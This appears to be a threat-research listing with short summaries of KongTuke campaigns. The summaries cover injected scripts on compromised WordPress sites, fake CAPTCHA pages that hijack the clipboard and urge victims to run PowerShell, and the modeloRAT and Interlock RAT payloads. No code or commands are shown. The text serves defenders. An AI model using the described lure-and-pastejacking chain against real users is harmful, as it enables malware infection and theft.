Threat Research

Security researchers uncovered ongoing attacks linked to the KongTuke threat group using compromised WordPress sites and fake CAPTCHA lures to spread the Python-based modeloRAT. Attackers inject malicious JavaScript that prompts users to run a PowerShell command, triggering a multistage infection process....

ClickFix-based campaigns have employed a rotating set of commands for clipboard-injected content. In late December 2025, the KongTuke campaign incorporated DNS TXT records within its ClickFix text. These campaigns regularly shift between ClickFix techniques, including the finger protocol and mshta....

We’ve discovered a new, resilient variant of the Interlock ransomware group’s remote access trojan (RAT), now rewritten in PHP rather than JavaScript (previously known as NodeSnake). This version has been actively used in a widespread campaign linked to the LandUpdate808 (aka KongTuke) threat clusters since May 2025....

The attack chain begins with a malicious script injected into legitimate but compromised websites. This script redirects users to a fake CAPTCHA page designed to mimic a "verify you are human" check. The deceptive CAPTCHA page performs clipboard hijacking—also known as pastejacking—by injecting malicious code into the user's clipboard....

KongTuke involves an injected script that causes associated websites to display fake "verify you are human" pages. These deceptive pages load the victim's Windows clipboard with a malicious PowerShell script and provide detailed instructions, urging victims to paste and execute the script in a Run window. This tactic is part of a campaign commonly tracked as #KongTuke....